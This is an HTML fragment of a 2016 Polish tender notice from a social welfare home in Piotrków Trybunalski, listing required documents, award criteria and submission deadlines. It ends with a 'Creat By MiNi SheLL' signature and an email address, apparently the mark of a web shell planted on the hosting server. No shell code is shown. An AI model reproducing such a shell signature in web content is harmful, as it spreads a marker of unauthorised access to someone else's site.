-  Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę  co najmniej 70.000,00 zł. 
- Aprobaty techniczne producenta w języku polskim.
- Certyfikaty materiałów użytych do realizacji zamówienia.
- Podpisany wzór umowy -  wg załącznika nr 8</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - wydłużona rękojmia powyżej 5 lat - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip,dompocypiotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej 97-300 Piotrków Tryb. ul. Żwirki 5/7 pok. nr 18 (sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2016 godzina 10:15, miejsce: Dom Pomocy Społecznej 97-300 Piotrków Tryb. ul. Żwirki 5/7 pok. nr 18 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com